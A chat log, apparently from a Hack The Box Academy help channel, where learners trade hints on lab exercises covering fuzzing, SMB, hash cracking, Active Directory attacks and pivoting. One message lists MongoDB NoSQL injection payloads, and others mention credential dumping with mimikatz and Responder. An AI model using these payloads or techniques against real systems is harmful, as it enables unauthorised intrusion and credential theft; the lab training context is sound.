#modules
If you still need help, then write me a DM
But it's when you have to try really hard that what you've learned sticks in your head.
I don't like it because the website's layout is a mess and a huge number of the rooms are just copying and pasting commands.
In your opinion, which texts are not professional?
@acoustic owl It probably depends on the definition of professional being used.
What? Htb modules are written way too professionally lol dunno what ur on abt.
THM rooms are more casual and treat you on a childish tone.
The problem w htb is assumption of prior knowledge, or the capability to self-research.
THM assumes you know absolutely nothing.
Thm is also mostly copy pasting commands which ig is good for memorization but doesn't help actual application.
I thought the learning process module was pretty bad lol.
Forgot which one the learning process one is, is it the one that lectures you on mindset and philosophy or smthn.
Yeah. It's full of dubious nonsense.
Sure, criticism is good too. Only I think, you should then write what disturbs. Only in this way can the author really improve.
I think that isn't a problem as much as the fact that modules sort of jump everywhere.
The linux fundamentals module covers way too much, with each section covering way too little.
At least the windows fundamentals module states what an ip address and port are.
Again, htb modules assume prior knowledge or the ability to research.
I don't think it's wrong, but I think that sort of stuff does not belong in a fundamentals module.
You're asked to give an inode number, but it's never really stated what exactly an inode is.
It talks about soft links, and could easily make a comparison to shortcuts in windows
and completely neglects hard links
It then brushes through apparmor and selinux, and iirc it also jumps around with the old service name restart and systemctl name restart syntax
I agree w everything (especially since I attempted buffer overflow and got so lost) but all this goes under the #858470491676737536 channel
Here is mostly for like helping people w modules so like....
Is anyone here good with nosql injection for mongodb?
Ask the question.
Write a script for it.
You can just make a hack for it using bash. It'll be easier that way.
Well, not bash. You can use python.
Are you doing the SQL injections fundamentals course?
I passed that one. I'm doing Introduction to NoSQL Injection now
Aaaa ok
Some people are not the best at using google and i feel the module kind of teaches one to do research with google
This just shows a fundamental misunderstanding of the field. You're not going to have everything spoon-fed for you in pentesting.
Then the problem is your expectations. You're being taught a set of skills - not being given a set of bullet points.
This isn't a subject that you can just be given the answer all the time. You will often come across situations that don't fit in the box, and you need to think outside.
With your current attitude, you're going to get a pretty strong reality check, if you want to keep going forward with pentesting. There's just no universal way to teach you the skills you need for this - you have to be open to self-research, and to know what to search.
The same thing applies to the medical field. Doctors have to cram an absolutely insane amount of material, but the end goal isn't that you memorize everything - it's that you know how to get the information you need, when you need it.
You are being taught well.
You just don't seem to like what you are being taught.
I mean, you're 4 modules in to a course with 28 modules. You have barely even scratched the surface.
So you're doing the modules out of order?
... what?
Sometimes I think people complain too much because it wasnt handed to them on a silver platter and some other times people blame not being able to instantly succeed as a failing of the material.
The problem is that you don't know what a high standard is here. This is a high standard.
You have expectations, which do not align with the industry.
yup
atm I think it is
the only stuff Ive seen be better has been very niche advanced content
It has room for improvement, but not in the ways you are saying.
I see a lot of people coming here with no foundation knowledge and then complaining about not understanding things.
Maybe the expectation here is to learn everything from scratch.
Exactly
Thats a terrible expectation to have
thats not what htb is for or designed to do
full stop
I didnt do fundamentals so I dont know their particular quality level
Should it teach you how to plug a keyboard in? How to touch type? There's a limit to what 'fundamentals' means.
what
also the fundamentals are free modules
didnt you say earlier your complaint was about paying for content?
you said this
Keep it with the modules in this channel please.
I don't think its perfect either. I agree though that frequently I see your suggestions just amount to more handholding
we are literally discussing modules right now
I thought this was talking about help for modules instead of personal opinions which are endless.
I fundamentally disagree with that
I think a lesson should always include area for exploration to understand the concepts
He... doesn't mean the module...
Things get a little more open ended when its late and theres little to no people actively asking for help
Ah for me its early, its 8:45AM here 🙂
This server is always absolutely dead at this hour.
late/early same thing. Most of the htb population isnt up and grinding content right now
so things get loosey goosey
long as its relatively academy related
I don't even think it's really off topic.
I agree, but its a bit diff if there was swarm of people trying to ask for help and they got drowned out by a debate
exactly 🙂
help is channel priority #1, but when thats not needed debate is fine
or at least it is if nobody snitches
Module: ATTACKING WEB APPLICATIONS WITH FFUF --> i dont get to see any status codes. Whenever i use ffuf on THM for example, it does work like it should. On HTB not.
You're going to have to provide an example.
Have this problem since the beginning of the module (2 months ago). Ffuf does not seem to work properly on HTB for me, it does on my own parrot machine and other places similar to HTB
on my way with it
gunna need to show your command and output
https://imgtr.ee/image/wPm1H ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.hackthebox.eu/
all the commands from the module
For some reason, the password didn't work for me but the hash did.
your terminal is too small
expand it
common go bin term output issue
Did the job, full screen only to see the status codes. Thanks
👍
Try putting a known subdomain into a single word wordlist and figure out why it's breaking
I do not have permissions to write files with my SQLi to /var/www or /usr/share
But according to the web configuration file at ||/etc/apache2/apache2.conf|| i should be able to (This file is shown in the picture)
Omah I made a dumb mistake, nvm
This is a comment and only shows where the Webroot is usually located.
The default path is /var/www/html
I found out the hard way (1 day of dying lol)
Google is very powerful for this kind of thing. 😉
Doesn't work all types of scans. Trying to finish the module with GoBuster because i dont like working with ffuf 😦
that was the issue with the screenshot you shared. Further issues would be different problems
I like both gobuster and ffuf
gobuster is nice when I want something quick and simple. Ffuf when I need power.
Agree lol
Maybe thats the case, i didnt do things that required alot of power 🙂 I'm just a rookie!
Since the beginning i have trouble with ffuf and the results showing (or rather not showing) the proper way. Dont want to waste any more time on it and finish it. For now i dont need that " power".
But in the future you will, knowing more tools will come in handy
Did you try -mc all?
Sorry i dont understand what you mean with that.
There are http response code options with ffuf
I am aware of that, those are mostly missing in my output/results
why isnt there a possibility to pay for hackthebox with paypal?
I dont have a creditcard
very frustating 😦
Had that too! Indeed frustrating
Hello, anyone did the Linux Privilege Escalation - Linux Services & Internals Enumeration? I think the question is bugged.
does anyone have a tip on content : (Interacting with Users) module :WINDOWS PRIVILEGE ESCALATION
stuck here so bad
i added Malicious SCF File in C:/
but only hash am getting is the hash of my own user lol
See if there are any other directories where a user might be able to access them.
u mean in the users or over all ?
Over all
Python Version?
yep
Have a look at the installation directory
Hi all
Please, Can you help me on :Password Attacks Lab - Medium
I get the doc zip, but i can't use it
I had trying john with mut_password.list hash
But i had this message:
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
No password hashes left to crack (see FAQ)
I had also: Dy! password, but doesn't work.
that's the correct approach. since the hash was loaded correctly I would assume your mut_password.list is broken
@acoustic owl check ur dm please
Hi, can u help me pls solve problem with tunneling
Module: AD Enumeration & Attacks - Skills Assessment Part I
Trying to use chisel + cme/xfreerdp as in this forum post https://forum.hackthebox.com/t/ad-enumeration-attacks-skills-assessment-part-i/259237/22
stuck on receiving timeout error
||proxychains4 cme smb 172.16.6.50 -u svc_sql -p lucky7||
Strict chain ... 127.0.0.1:1080 ... 127.0.0.1:1080 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:1080 ... 127.0.0.1:1080 <--socket error or timeout
hey everyone
AD Enumeration & Attacks - Skills Assessment Part II
Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.
how can i upload a mimikatz on the machine
that's not what you're looking for in this case
dm you
hi guys any mod around to give me a hand with #bot-coomands
im trying to identify and the bot is being mean
for the session security skill assessment I have the auth session cookie for the admin but im stuck trying to figure out how to use it to login to admin account
like i swap the auth session cookie and just nothing happens
I figure out how to finish the burp suit exercise, the problem was that even tho i put a "200 OK" it wasnt appearing there, so all the requests with 404 made me lost the 200 in the wordlist
Does |\ separate # and ; in this context and filter out both of those?
u can dm me, i may be able to help
but make sure the cookie you are getting is after u have sent the link to the /submit-solution endpoint
Since it's inside the double quotes probably you don't need to escape the ";", as alternative you could do:
grep -v -e "#" -e ";"
Aa oke
It means you already decoded the password
Before
i figured it out, i fcking named the script .txt instead of .php like an idiot and it made the session a different token
( First, try to update any city's name to be 'flag'. Then, delete any city. Once done, search for a city named 'flag' to get the flag.) can you help me for this question when i try to update the name of an city to flag i have this . []
I have an issue with ffuf, and ive had this issue every time i use it. Whenever I run it it says every parameter in the list I use is a valid result but Ik thats not right, has anyone else had this issue?
like every time ive ever had to use ffuf its just like this
Am I seeing wrong? - https://academy.hackthebox.com/module/112/section/1067
query user 0x3e9 and it talks about cry0l1t3 xd
Hey all. I am in "Kerberoasting - from Linux" in Active Directory Enumeration & Attacks. I am on the question "Retrieve the TGS ticket for the SAPService account. Crack the ticket offline and submit the password as your answer". I am using hashcat: hashcat -m 13100 hash.txt rockyou.txt --force and I get that the Status is "Exhausted". I added the passwords we already found to the rockyou list also. Any guidance?
Aaa nvm i was seeing wrong
Submit a baseline request that has not been modified with valid parameters that will be processed successfully by the application and take note of the response. Then try submit invalid sequences of characters and logic in order to generate a database or application logic error to return to the client.
@barren escarp I haven’t completed this module yet, but MongoDB often faces attacks targeting its $where operator. Or parameter injection like https://example.tld?login?user[$ne]=1, u can attempt various attack strings, including JavaScript function insertion, JSON insertion ({}), and try fuzzing with different attack strings some attack strings to consider are
• true, $where: '1 == 1'
• $where: '1 == 1'
• ', $where: '1 == 1'
• 1, $where: '1 == 1'
• { $ne: 1 }
• ', $or: [ {}, { 'a':'a' } ], $comment:'successful MongoDB injection'
• db.injection.insert({success:1});
• db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
• || 1==1
• ' && this.password.match(/.*/)//+%00
• ' && this.passwordzz.match(/.*/)//+%00
• '%20%26%26%20this.password.match(/.*/)//+%00
• '%20%26%26%20this.passwordzz.match(/.*/)//+%00
• {$gt: ''}
• [$ne]=1
Why are you filtering the response size of 2287?
In your case I’d be using the -fs 2309 switch because you want to find the response size that deviates from the norm
Why doesn't this work? Am I submitting the right SMB banner?
probably cause it's wrong
Reload the page and make sure there are no spaces at the beginning or end of the string.
I reloaded it
Tried the same, made sure there were zero spaces
didnt work
Footprinting - SMB
do a manual banner grabbing or use nmap
Manual via netcat?
can work, otherwise use nmap
Try running sudo nmap 10.129.X.X -sV -sC -p139,445
Aaa
So its the version
Not the banner?
The service scan solved it
But I dont get why, is SMB and Samba the same
wait
Lol
asking the question i realised
you were looking probably at the output of smbclient
go ahead and you will find it out
Why do I get the SMB share version using smbclient but using service version i get the samba version
Samba is the open-source implementation of that protocol used by non-Windows systems to interact with Windows-based file sharing and networking services.
But if i check the sambashare i get the SMB version, is it the version of that specific share?
The question is a bit cryptic but it’s asking you what version of SMB server is running on the target system - not asking about the version of the share
I was an idiot and just overlooked the 1 that size was different cause I’m blind
Yes, they are heterogeneous. You are getting confused because the question is saying to submit the full banner but by full banner they mean basically include the word samba with its version number
Yeah looked like you were filtering the one size that you needed 😉
hello everyone, i really need help, i am in the chisel section in the PIVOTING, TUNNELING, AND PORT FORWARDING module, and when i want to start chisel in the pivot host (ubuntu) it tells me that:
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)
The ubuntu is not connecting to internet so, what can i do ? pls
just get a pre-compiled version
Compile with Go 1.9 and bunch of minor additions and fixes
What's Changed
Update README.md by @NitescuLucian in #329
Update server.go by @Masterxilo in #365
README: remove -v from go install c...
ok thank you i'll test that
Can a SMB server have another SMB share run on it?
how can i download it ?
As I can see it is built like Samba SMBD is the main server and ||InFreight SMB 3.1|| is a file share on that SMBD server
Yes, you can set up multiple shares. Don’t overthink it. Stick to the methodology. You have an IP address and you want to find what ports are open, then what services are running on those ports. Then you want to find the version of those services. Then you interact with those services.
Yes but it has a file share named ||InFreight SMB v3.1||
scroll down the page, and select whatever version you need, either linux or windows
ty
So therefore I am thinking, can I host a SMB file share on a samba server
Yes, but the question is not asking you to submit the name of the file share?
then use: gunzip -d <YOURFILE>
Nono, I got the answer
I am just asking as a general question
and don't forget to chmod +x <YOURFILE>
Ahahah ok i'll do not ty 
Yes, It allows non-Windows operating systems such as Linux, Unix and macOS, to communicate and share files with Windows systems using the SMB/CIFS protocol. Samba provides file and print services that are compatible with Windows-based clients
aaaa
so its like
a samba server with smb running on it
nvm it says the SMB share has a customized version
So I think they did that to confuse me
Please, I'm stuck in password attack labs,
I had the both user name J & D,
can someone give me a hint?
Examine the second target and submit the contents of flag.txt in /root/ as the answer.
https://academy.hackthebox.com/module/147/section/1335
This is killing me - I’ve been trying to crack the hash from Attacking Common Services - Attacking SQL Databases. Nothing seems to work…Also, I get different hashes depending if I use Responder or Impacket-smbServer. Any help much appreciated 🙏!
You do a bit of moving around from one user to the next, root isn't always achieved from one user
what account are you trying to crack
If using hashcat make sure you're using the right -m
Thanks for such quick reply! Account is mssqlsvc.
Have you already tried everything from the section?
Thanks you response 🙂. I have used pretty much every single one for hashcat 😂. After using hashid I’ve mostly been using 1000
Well if you're using the wrong hash mode you're not gonna get an answer loll
1000 seems correct though
What wordlist(s) have you tried?
can you give me more details please
Ah…don’t suppose you could give me a nudge on which one I should use instead? I think I went through the entire list here —> https://hashcat.net/wiki/doku.php?id=example_hashes
The one from the resources folder, fastrack, rock you and one from the passwords folder in Seclists
You start from user 1, then go to user 2 after finding their credentials. Something about abstract thinking on why a certain file would be password protected
What is the command you are running
||hashcat-m 1000 - a 0 hash file.txt wordlist.txt ||
Is hash file in your filesystem with a space?
No, sorry, spellcheck decided to add that. Just put in pseudo names for file names. I’m using txt file for the hash.
Does hashcat tell you it's exhausted?
Yeah, constantly 😂
Anybody can help me with the question from WEB REQUESTS module, is the part of CRUD API. The question is the following: First, try to update any city's name to be 'flag'. Then, delete any city. Once done, search for a city named 'flag' to get the flag.
I've sent the correct request to update the city using London, and I confirmed the existence of the "flag" city with another curl command, but after deleting london the request to flag has the same info I sent with the PUT request.
AHHH
im finally on the last part of the file inclusion skill assessment
i can literally see the flag.txt file but cating isnt working
i am losing my mind
nvm im an idiot i just had to vent
i thought the flag would be standard HTB[] format but it was a random string
Use rockyou and john.
Thanks, but tried that and I got this error —> Unknown ciphertext format name requested. I can only think that my hash is incorrect at this stage?
Whats the md5sum of your hash
md5sum file
Note it worked with john without needing to change or alter anything to the file
OK figured it out for hashcat; it's ntlmv2, so 5600 not 1000
For the raw hash you should get
If you don't have the full hash it will not spit the answer out
is there any social engineering machine or module
You my friend, are a MASSIVE legend!! Thanks so much 🔥😎
It took me a bit of troubleshooting myself to figure it out
Then I did ctrl-f on the page and was like "ohhh multiple ntlm types"
how do i remove lightspeed from my windows 11 laptop
Google it
This is wholly unrelated to academy modules
Looks like it's a mobile device management tool for schools
¯_(ツ)_/¯
New to the I.T. world. Was wondering if anyone knew which module would be a good start for me to learn some fundamentals that lead towards an A+ cert and then to CCNA cert
Professormesser
Any of the fundamentals modules really. A+ is fairly basic
Linux Fundamentals
I studied for the A+ then I went into the fundamentals path, I feel it would be a bit brutal without the A+ knowledge (I didnt take the test lmao)
Linux isn't gonna be on A+
Lol
Also ccna covers networking, security and like a few other things
Have you watched the networkchuck CCNA course(the free one)?
No
no but I have seen it pop up. I just noticed that when I am in school for some of my networking classes that I don't have a clear understanding on networking and the terminology so I feel like I am lost when listening to people talk about numerous topics in cybersecurity. If it's broken down barney style then I'll be able to get it down
hey could you help me for Oracle TNS?
i logged in with the scott/tiger but i can not find the password hash for the DBSNMP user. any help?
select password from all_users where username = 'DBSNMP';
will not return password hash.
hello i just joined the server so wtf is happening
nothing
wait i think a joined the wrong server my bad
Could anybody explain why i have mistake: "exploit completed, but no session was created.", when I use "msf > use exploit/windows/smb/ms17_010_psexec" ? Thanks for you help.
Because something could have been incorrect in your exploit settings
i have used default settings, what was in MSF at the HTB virtual machine
Exercise link?
You could try using a regular reverse shell instead of a meterpreter one, sometimes that works for me
hey guys, im stuck at common services attacking - sql part. trying to log in htbdbuser user with no success from mysql, getting error tmyj-7i2o
anyone who dealt with it before?
Whats the command you're using?
mysql -u htbdbuser -p 'MSSQLAccess01!' -h
I dont remember that section but Id be shocked if a mysql db had MSSQL as part of the password
well that's the password written on the authentication
yeah but are you positive its mysql?
Try impacket-mssqlclient
mssql and mysql are different sql services
^ this
i need help ha(kers
The point being: the password even tells you mssql
Like its not technically impossible for it to be that way. itd just be a dick move by HTB
Inb4 it's completely unrelated to the channel
and I dont remember such a dick move
That sounds more like something that would be on a box
well got it guys lol
and I remember most of the dick moves
thanks
np
Ask your question
are you hacker?
private dm
hushhh
You can feck off then
:)
If you don't have the balls to ask your question publicly and be potentially directed to the right resources. Then I'm not helping privately
they yall gonna report meh
fine shawty
He doesn't know 
Ill do it anyways
<@&861185840277487616> person is spamming module offtopic stuff with trying to DM people about server breaking rule stuff.
okiiiiiiiiiiiiii
feck off
not helping your case 🙂
i need hikers friends 😦
This is clearly the worst possible way to do so
I like to hike
ha(ker
Ha*ker
any help?
i tried. but only shows me the users
i could not find the syntax. if you know then, tell me
I had some progress, when i used "set PAYLOAD payload/windows/x64/meterpreter/bind_tcp" . I connected. But i can't find file "flag" or dir "Desktop". Operation failed: The system cannot find the file specified.
Use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents as the answer. It is the goal
why are you trying hydra against a ssh server that doesnt support password auth?
and the second one the error says it doesnt support smbv1, so youll have to target smbv2 or smbv3 n such
that was a bug for the module
didnt show me the sys.user$ data
guys i messed up a little with impacket-mssql, trying to locate the user and know how to use sql language but not mssql much
Yes, and it’s generally a bad thing to do so a lot of people will turn that off
Yup, doesnt necessarily mean guest has access to anything useful, but worth checking
hey guys, I am working on the attacking drupal in attacking common applications, and when I try to upload the downloaded php filter file the webpage claims the php filter is already installed but then when I go to make a basic page, the page does not have the option for me to make it a php filter. Am i doing something wrong?
You did though
SHAREDRIVE is not a default share
smbclient is just giving you some errors about smbv1 which you already knew was disabled anyways
What prompt
Cause you have the listing command
and didnt specify a share to access
review your notes on smbclient
the nmap module was surprisingly tough for me to finish so I ordered the Official Nmap Project Guide by Gordon Lyon
hopefully it will make as good study material for the CPTS
thanks @west canopy !
hi everyone i need some help, idk how can i transfer socksoverRDP binary from my linux to the pivot in the PIVOTING, TUNNELING, AND PORT FORWARDING module, idea ?
i have tested wget with a python server in my linux but doesn't work
what kind of access do you have to the pivot host?
local admin
no I mean like RDP/SSH
if you are using xfreerdp you can specify a drive (directory) that you can mount
good idea
hello everyone
im stuck on the last question on the AD Assessment part 2, my brain just blocked so if u have any hints on how to get the KRBTGT hash please let me know
I'm not sure how to hint this without straight up giving away the method. let's say there is a method for stealing all hashes there are, which would include KRBTGT
I would be concerned if you got all the way to the end of the module and didn't know how to do that
eh if you've been staring at it for a couple of hours your brain is gonna melt at some point
I believe it's supposed to be you finding some kind of documentation file and simply grabbing credentials from it, regardless of what it actually documents
ty all it's been in front of me the whole time
the service you're looking for is on page 2
anyone available for a hint for Linux PrivEsc / escaping restricted shells?
https://academy.hackthebox.com/module/51/section/1845
I've tried a bunch of stuff but I have no clue how I could escape this
You'll need to try additional techniques not covered in the module
I figured. any useful resources on this?
Escape from Restricted Shells # At a Glance # Restricted shells limit the default available capabilities of a regular shell and allow only a subset of system commands. Typically, a combination of some or all of the following restrictions are set1:
Using the cd command. Setting or unsetting environment variables. Commands that contain slashes....
I have a question on the Broken Authentication Module. In the Default Credentials section https://academy.hackthebox.com/module/80/section/772 The question is "Inspect the login page and perform a bruteforce attack. What is the valid username?". I already solved it by looking at the HTB forums and doing some digging etc. My question is, is there a logical way to determine the list of default passwords needed for this? Nothing in the section, none of the links etc, lead me to the answer. I see looking at the source code that I get the hint HMI/Scada but the company and answer are not on any of the github repos etc that are listed in the section. It seems like I am either missing something or this is a serious fishing expedition to guess the answer. I appreciate any feedback on this! Thank you.
The contents of the target webpage should give you hints for specific lists of default creds to look for
Saying anymore would be a bit too much of a hint
Ok maybe my google foo was off the first time, I just tried it again and duckduckgo gave me results for the first hit. I guess I was reading too much into the links etc provided in the module. Thanks!
It be like that sometimes
madf0x has been saying this, but if what you’re doing deviates from what the modules say, but you’re still getting to the same place, that’s good!
Experimenting and messing with things is key. Sometimes the module’s text just gives you the answer, other times there’s just a much better way to do things.
There are other times where its deliberately designed that way too
Ever wonder why AD is after pivoting? Or file inclusion after ffuf?
😉
for sure, I get they want us to think outside the box! I get that tunnel vision sometimes...
There are elements in those modules that wont be stated you should do at all, but are 10x easier if you apply lessons from earlier modules without being told to do so
Hey! Would it be possible to get a nudge for the Documentation & Reporting Practice Lab in the documentation & reporting module? The one where you have to get domain admin by completing an in-progress pentest?
gotta admit, i suck at AD lmao
ignore the in progress report, do what youd normally upon first landing on an AD network
I'd fire up responder and see if I could get any hashes. Doing that i get a bunch of hashes from a bunch of accounts. I'm assuming the password for the Domain Admin is behind one of these?
Why ask when you can try
cool, thanks!
I want to learn from some expert player.
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@cyan cosmos ^
hi
I mean theres plenty of juicy looking stuff there to start investigating
Press 'q' or Ctrl-C to abort, almost any other key for status
<REDACTED> (?)
1g 0:00:00:03 DONE
also spoiler
ah lol I never use john
I thought that means that it was cracked not that it was the password lol
I think you also have to add the format with --show for it to to reveal it properly that way, but idr
me too but I couldn't find the ID for sha512
I know but no of them work
Thanks @rustic sage
lmao it looks like Moo32 snitched on himself if not for time difference
Help pls have been stuck on this for days, AD Skill_2: Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.
I have the CT***** user and i know this user could changes some information for high privilege users, and finishes everything
I have been trying to do so , with no results what so ever, any help is well appreciated
its a skill assessment so what help can be offered is limited
but you already have a key user, and know it has privileges that can be leveraged
review the section notes about how to leverage those privileges
I really did review the section notes, it doesn't seems to be working and don't know why
I can dm if possible
Im headed to bed unfortunately
CVE for Instagram
ahahahaha
Your account is even verified
you should know this isnt the channel let alone server for this
its completely off topic, and theres no ethical reason for asking for a CVE for a public website
any variant of 'how to hack Instagram' is going to be a rule 4 violation
Bro thinks he can gaslight us like chat gpt
i just wanted to know how instagram had been hacked in the past
for educational purposes
You can search on bb sites for disclosed Instagram bb reports.
But this is the wrong channel, you're asking the most off topic thing there is.
Hello does someone has any material about becoming proficient with Linux and windows shell command line ? Thanks
ok my bad soz
For Linux, setup a vm and get used to using it.
Linux journey helps too.
Thanks
SOLVED!!
Did you get this to work? Once again the instructions in the module are way too simplified...
Indeed, I just over complicated the instructions in the module
But how did you manage to ssh to that address since it's giving the error for wrong password
actually you can't ssh, only RDP is possible
i didn't try chisel {proxychains} though, i just wanted to finish the section
Even with RDP i can't get the secretsdump to work..
dm me
has anyone solved the updated AD assessment level 1?
Hi! I need a hint for the windows escalation path. I am trying to resolve the finals skills (part I), but I am very frustrated. I can't upload any files in the victim machine. I tried a lot of ways. I can establish connection with metasploit and manually with a reverse shell. Can someone give me a hint for the best way to escalate privileges? Thanks a lot
I have tried in metasploit with the upload function and in the reverse shell with modules to download files through powershell from my attack machine, but everything gives me an error
I was inspired to ask, I just got it jajajajaj
Hi
27 modules left until i become a hacker
who can help me? https://academy.hackthebox.com/module/147/section/1335
What exactly do you need help with?
Then you take the exam?
well yeah he's required to XD
You understand that
or 1=1
Congratulations, you are a hacker 🥳
well if you're doing bug bounties, you don't need the exam.
They don't require certifications to take part in those.
But if you want to get a job, then it's a different story.
I got a person's smb credentials through crackmapexec in the medium lab, I got a Docs.zip file after connecting through smbclient, I also cracked it, but it was a docx document, I opened it with garbled code, so what should I do now
if i learn all of cpts i should have all the knowledge of a hacker right
i cant start working for another 2yrs unfortunately
No, then you have learned the basics.
Okay, advanced basics, but in this field you will never be done learning.
Check out the Academy to see how many modules there are outside of the CPTS pathway.
way too many
how many have u done
bug bounties won't require the whole CPTS route, it's mainly just web bugs.
No, I can't hack people. How could I? A brain doesn't have a USB interface or anything.... 😉
come on u know what i mean
I don't want to hack anyone's accounts at all. If I do, I want to help a company find vulnerabilities in their servers.
you can only hack someone if they consent or ask you to do so, or else it's illegal.
Doesn't take a genius to know all this.
classic alex
yes but sometimes people ask for penetration test on them right
to test for vulnerabilities
you don't penetration test someone wtf?
Only companies do that
Aside from being off topic, can we not humor him? He's asked nothing but inappropriate questions since he's joined.
Maybe if a person wants to know how much info you can get on them, or if you can get into their accounts, but that's just very very unlikely.
@proud pine first time reading him?
oh
srry i just didnt know
im new to all of this
hard to tell if somebody is trolling or genuinely oblivious nowadays
If you attack someone's account, even if they ask you to, you must always get permission from the server operator as well.
The server operator must agree to a pentest
ok
i can never get why somebody wants to hack another person.
if it's easy for somebody as oblivious as you to do it, you should be worried for yourself.
@rare topaz except htb machines
Let's stick to the channel topic otherwise, either take it to #general or DM's. thank you
who can help me with this module https://academy.hackthebox.com/module/147/section/1335
DM
🤔
Nope
maxi._09 (733343360261161021) has been banned until 2133-05-02 12:00:54 (UTC). Could not DM banned member due to permission error.
Thanks 🙂
Anytime! 🙂
Has anybody completed 80/80 of the modules?
If anyone is at least close to it that would be PayloadBunny but I think he isn't quite done either
Wdym lol
Oof
what do you mean?
What is the question you want help with? What is the issue you are having?
What did you try to get the flag mind sharing your process and at what point are you stuck?
Now I've reached the critical stage. I'm logged in to jason's server, but I don't know what I'm going to do to get into Dennis's server and read flag
Slow and steady
Do some more enumeration on the server. Jason can get dennis' password
I've enumerated jason's services, but I don't know what to use next. What should I do
What services does he have access to?
mysql?
thanks @west canopy
in Web Server Pivoting with Rpivot the flag I got from the webserver isn't working, for the question: Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer. Can somebody help me with it please?
ah sorry for not responding. yes, that seems interesting
I connected to MySQL, got Dennis's password, and now I'm logged in to Dennis, but then I'm running out of ideas
is this password attacks medium?
Stuck on pivoting skills assessment and would appreciate some help with the final hop. I have access as ||mlefay|| to the first internal network host ||172.16.5.35|| and also got what I'm pretty certain are ||vfrank credentials (cleartext and NTLM hash) with sekurlsa::logonpasswords on .5.35||. I ran powershell one-liner to ping hosts in the ||.6.0/24 subnet|| and have come up completely empty handed. I'm also running the command in a cmd prompt running as administrator. Any nudge would be appreciated.
yes
Nice, I am right behind you 🙂
You can dm me.
looks behind themselves frighteningly
I can help you out with this, you just need to find live hosts in the subnet.
Dm me.
umm you should find hosts in that subnet. I suspect you need to increase the timeout as connection in the internal network is very slow
ahh okay I'll try that
[-] Kerberos SessionError: KRB_AP_ERR_BADMATCH(Ticket and authenticator don't match)
for the 'Introduction to windows command line' module, every time I ssh into the machine why does it automatically take me to the Powershell prompt but not the command prompt? How do I get to the command prompt?
Can’t you just type cmd in PowerShell to get to the command prompt?
Hi friends, I am stuck in Footprinting Lab-Easy. I have connected into the sftp server and have found the flag.txt. I am having trouble reading it. I cant cat it. it says invalid command. Can I get a hint please?
simply write "cmd"
Hi
FTP is used for file transfers
Transfer the file to your local machine
You cd to the flag directory, then you can cat flag.txt
You're logged in as ceil, right?
yes I did. Looking up where is the file I trx.
Use ls -la
Use cd .. to move to the parent directory.
Type ls -la to see a detailed listing of everything, including hidden items.
Use cd flag to navigate into the “flag” directory.
Enter cat flag.txt to view the content of the “flag.txt” file.
I am trying to look for a host with the FQDN that ends with x.x.x.203
I cant find it
you may need to code a script for this to loop through what you already have and find more subdomains
I tried doing it manually, but didnt find anything
module has provided you two I think
Yes
first try is going to be easy:
try zone transfer on all websites/zones you have found
then move on to more time-consuming steps such as bruteforce
ayayay ok
Same, I can't figure out the htbuser password, I also found the 5 possible passwords, but none work.
DM me
I need a hint for linux PrivEsc logrotate. I'm unable to figure out which log is being rotated. pspy told me that there is a cronjob running that rotates it but I can't figure out which one. is there a way to figure it out or do you have to just try everything you stumble upon?
Try appending data to some interesting looking log files. The one that gets removed shortly after is the target one.
I had the same issue first. It turned out I didn't try all combinations
Normally the rotation would take longer but they set it up to go every 5 seconds iirc
yeah I've seen that. aight lemme try
hi everyone, i'm a little bit stuck at the 3 last questions of the port tunneling, forwarding... skill assessment, i found the user vfrank but idk how can i get his password ? can someone help me pls ?
I tried adding a timeout in windows CMD (no timeout option I'm aware of for powershell) and the whole loop completes in a second... 😅
let 100, you have to start it multiple times for it to work
okay I found the log and logrotten is saying that it rotated and that my payload has been copied over. I'm not getting a reverse shell though :/
worked well with 200 for me
None of these have the IP, i tried bruteforcing the other subdomains and I got nothing
Trying it out now
guys im banging my head against the desk for the last few hours with something non htb related is it allright if i ask here its a linux thing im trying to do for some extra practice
Use the smallest list. If you don't find anything, use the next larger list. 5000 entries are too many
got it 🙂
I found the vfrank hash but i can't crack it, is it normal ?
That's which module/section?
So it stops after 5000?
I tried with 11000
And found nothing lmao
No, but all lists with 5000 and more entries do not contain the searched host 😉
WHa
Look at the hint
finally found some new hosts!!
thanks! @heady tusk @whole grotto
Awesome 🙂
So, I should use a different wordlist
ok i found his hash but should i have to crack it, because i tried with rockyou and i found nothing
hey everyone, I am new to cyber security
sup
whats the hash in?
You actually don't need to crack it. You can find a cleartext version
really ? how ?
i dumped it with mimikatz
Check the output again
I have tried all of them, from the ones that dont give errors ive got this
5000 are too big
i see nothing, i ran this command : sekurlsa::msv
Bunny, may I ask how many modules you've got done? Iirc you've been pretty close to having all of them done
How about sekurlsa::logonpasswords?
how ty
🙂
Ah cool 🙂
Gonna take me a while to catch up to that 😄
at some point you get addicted to these modules
Yeah I'd probably be doing them all day if it wasn't for uni keeping me busy
did you finish the module ?
I've done CPTS path all the way up to Linux PrivEsc. currently working on that
well, actually it's just a login and not a real priv esc
oh ok cool, so do you know if it's normal that the xx.xx.10.5 is not up for the last question?
is it the dc ?
that host is supposed to be up, yeah
||yes||
and i have to rdp on it 
if it has RDP up, sure
What did you find?
I have notes on these but they are a little rusty, dm me.
RDP is not up 
who can help me with the module https://academy.hackthebox.com/module/147/section/1356
what have you tried so far?
What does not work?
I will Dm you
Sure, let's solve it 🙂
I know. But there is another way
psexec ? 
Haven't tried that. Did something much more simple
But there are multiple ways at this point so feel free to experiment
I tried ssh root@{ip} -p {port} -i id_rsa, and it's not working for some reason. Do you have any idea why?
What Have you done so far
I gained access to user1
and copied id_rsa from root, but it's not connecting for some reason
Is this an exercise?
yes
Have you checked permissions on id_rsa?
yes
Which exercise?
ssh doesn't connect
Getting Started Privilege Escalation
Well then providing us with the error message would probably be helpful
Yh definitely
that's the problem, there isn't an error
Huh
Let me see my notes
I used cp to copy the ssh key
Okay
and wc -l says they're the same
Then I don't know why the ssh ain't running then
neither do I
